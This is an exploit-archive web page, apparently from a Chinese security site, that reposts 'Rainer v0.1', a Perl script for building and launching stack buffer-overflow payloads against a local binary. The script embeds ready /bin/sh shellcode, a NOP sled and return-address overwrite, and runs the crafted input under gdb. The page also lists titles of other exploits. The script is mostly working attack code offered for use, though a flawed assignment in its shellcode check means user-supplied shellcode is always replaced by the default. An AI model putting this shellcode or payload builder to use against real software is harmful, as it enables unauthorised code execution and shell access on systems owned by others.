首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Rainer v0.1 by localh0t
来源:mattdch0@gmail.com 作者:localh0t 发布时间:2011-08-30  
#!/usr/local/bin/perl
 
# Author: localh0t
# Date: 18/06/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
 
# Help
if(!$ARGV[2])
        {
                 print "\n\n###########################";
                 print "\n# Rainer v0.1 by localh0t #";
                 print "\n###########################";
                 print "\n\nUse: perl $0 -t [BINARY TARGET] -s [SHELLCODE (Optional)] -n [NOP's AMOUNT] -r [RETURN ADRESS] -m [RETURN METHOD (Optional)]\n";
                 print "Example: perl $0 -t ExploitMe -s \"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x99\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\" -n 60 -r \"\\xb8\\xf3\\xff\\xbf\" -m Normal\n";
                 print "\nNote #1: If shellcode not defined, default to: 24 bytes /bin/sh shellcode.\n";       
                 print "Note #2: If method not defined, normal method will be used.\n\n";
                 print "Methods:\n========\n";
                 print "Normal : shellcode + nops + ret + null\n";
                 print "NOPsled: nops + shellcode + ret + null\n\n";
                 exit(0);
        }
 
# Default shellcode, 24 bytes /bin/sh
$default = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
 
# Set all to -1
my ($bin, $shell, $na, $ret, $meth) = -1;
 
# Giving values to variables
foreach $loop (@ARGV) {
        for ($loop) {
                /^-t$/ and do { $bin = $ARGV[($arg+1)]; last; };
                /^-s$/ and do { $shell = $ARGV[($arg+1)];  last; };
                /^-n$/ and do { $na = $ARGV[($arg+1)]; last; };
                /^-r$/ and do { $ret = $ARGV[($arg+1)]; last; };
                /^-m$/ and do { $meth = $ARGV[($arg+1)]; last; };
        }
        $arg++;
}
 
# If shellcode not present, default used
if ($shell = -1)
{
        $shell = $default;
}
 
# NOPs payload
$nops = "\x90"x$na;
 
# Functions
sub normal{
        my $bin = shift;
        my $shell = shift;
        my $nops  = shift;
        my $ret  = shift;
        $payload = 'gdb --eval-command="run" --args '.$bin.' $(printf "'.$shell.$nops.$ret.'\x00\x00\x00\x00")';
        return $payload;
 
}
 
sub nopsled{
        my $bin = shift;
        my $nops  = shift;
        my $shell = shift;
        my $ret  = shift;
        $payload = 'gdb --eval-command="run" --args '.$bin.' $(printf "'.$nops.$shell.$ret.'\x00\x00\x00\x00")';
        return $payload;
 
}
 
# Main
for ($meth) {
  /^Normal$/    and do { $payload = &normal($bin,$shell,$nops,$ret); last; };
  /^NOPsled$/     and do { $payload = &nopsled($bin,$nops,$shell,$ret);  last; };
  -1    and do { $payload = &normal($bin,$shell,$nops,$ret); last; };  
}
 
exec($payload);
 
__END__
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·构造注入点后门代码(asp,aspx,p
·mp3 Kaydet Local Buffer Overfl
·DVD X Player 5.5 Professional
·DVD X Player 5.5.0 Pro / Stand
·Free MP3 CD Ripper 1.1 Buffer
·Citrix Gateway ActiveX Control
·Windows7/win2008 提权0day
·Linux Kernel 'perf_count_sw_cp
·DVD X Player 5.5 .plf PlayList
·BroadWin WebAccess Client Mult
·Apple QuickTime PICT PnSize Bu
·Apache httpd Remote Denial of
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved